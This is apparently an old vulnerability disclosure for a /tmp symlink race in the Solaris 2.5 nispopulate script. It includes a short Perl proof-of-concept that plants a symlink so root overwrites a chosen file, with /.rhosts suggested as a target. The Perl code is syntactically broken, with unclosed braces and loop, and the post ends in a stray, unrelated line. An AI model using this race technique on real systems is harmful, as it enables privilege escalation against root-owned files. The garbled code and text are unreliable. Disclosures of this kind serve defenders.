Solaris 2.5
Runeb has send following vulnerability. The script
'/usr/lib/nis/nispopulate' creates files with modebits 777 in
/tmp. The files gleefully follow symlinks to where ever you like
them to.
In an attempt to make the names unpredictable, the filenames are
postfixed with the process-id and a number from 0-4. However, the
script does the following:
1. creates files /tmp/sh<PID>[0-4] w/permission 666
2. waits for user input
3. creates file /tmp/passwd_<PID> w/permission 777
A malicious program monitoring the /tmp directory for filenames
'sh<PID>[0-4]' can snip out the PID and insert a symlink at
/tmp/passwd_<PID> before it is created in step 3.
'nispopulate' is used for migrating /etc-files or NIS-maps into
NIS+-tables. It is run only once during the setup of a NIS+
server. So, no need to be alarmed. Runeb is not too sure about
the rest of '/usr/lib/nis/*', but all of the scripts seem rather
crummy as far as /tmp and filepermissions go.
The attached perlscript sits waiting for /tmp/sh*' files to be
created. When they are, a symlink to $destfile is placed in
/tmp, in this case / It could of course be /.rhosts,
/usr/bin/.rhosts or whatever.
NB! The exploit works only when you run 'nispopulate'. The other
'/usr/lib/nis/*' scripts will have no effect. This has the
pleasing effect of preventing someone from starting the exploit
and start hassling their admin to intall nis+. :)
To test:
---------------------------- clip --------------------------------
# to test: 1) start the script 2) as root, run /usr/lib/nispopulate
# Demonstrates weakness in Solaris 2.5 /usr/lib/nis/nispopulate
# shell script, by inserting a symlink postfixed with pid
# -
$destfile = "/";
do {
opendir(TMP, "/tmp");
while ($f = readdir(TMP)) {
if (substr($f, 0, 2) eq "sh") {
symlink($destfile, "/tmp/passwd_" . substr($f,2,length($f)-3));
$quit=1; last;
} while $quit == 0;
Do you need that? If not, erase it. If yes, rename it. I guess
Sun will came up with fix soon.